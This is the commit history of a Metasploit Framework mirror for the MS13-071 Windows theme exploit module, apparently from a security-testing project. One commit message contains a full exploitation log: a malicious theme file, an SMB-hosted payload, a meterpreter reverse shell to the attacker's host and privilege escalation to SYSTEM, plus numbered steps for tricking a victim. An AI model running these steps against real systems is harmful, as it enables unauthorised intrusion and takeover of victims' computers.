infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
36,031 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

18 Commits (9f4f478d2ddc021fcc1a810bee7f42030a243566)

Author SHA1 Message Date
jvazquez-r7 a06eb04d59 Deregister FOLDER_NAME on exploit modules 2015-03-05 12:27:12 -06:00
jvazquez-r7 aaab4b401a Fix indenting and use primer 2015-03-04 10:46:34 -06:00
jvazquez-r7 0e57277dc1 Do cleanup 2015-03-04 10:33:57 -06:00
jvazquez-r7 b9ed8178a9 Solve conflicts on ms13_071_theme 2015-03-04 10:28:52 -06:00
Matthew Hall 4757698c15 Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00
Matthew Hall e6ecdde451 Modify SMB generation code to use primer based on #3074 changes to 
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
 2015-02-20 11:35:22 +00:00
jvazquez-r7 0372b08d83 Fix mixin usage on modules 2015-02-13 17:17:59 -06:00
URI Assassin 35d3bbf74d
Fix up comment splats with the correct URI 
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
 2014-10-17 11:47:33 -05:00
Matthew Hall f72d54b9df Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer` 
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
 2014-04-30 12:14:58 +01:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat 
[SeeRM #8496]
 2013-10-15 13:51:57 -05:00
sinn3r 23b0c3b723 Add Metasploit blog references 
These modules have blogs from the Rapid7 community, we should add them.
 2013-10-01 20:50:16 -05:00
Tod Beardsley 2656c63459 Knock out a Unicode character 2013-09-23 14:22:11 -05:00
Tod Beardsley 4bff8f2cdc Update descriptions for clarity. 2013-09-23 13:48:23 -05:00
jvazquez-r7 8417b916c7 Complete MS13-071 Information 2013-09-21 21:22:34 -05:00
jvazquez-r7 9b486e1dbb Add comment about the smb_* methods 2013-09-19 13:23:46 -05:00
jvazquez-r7 60d448f600 Add minor cleanup 2013-09-18 14:10:13 -05:00
jvazquez-r7 68647c7363 Add module for MS13-071 2013-09-18 13:40:35 -05:00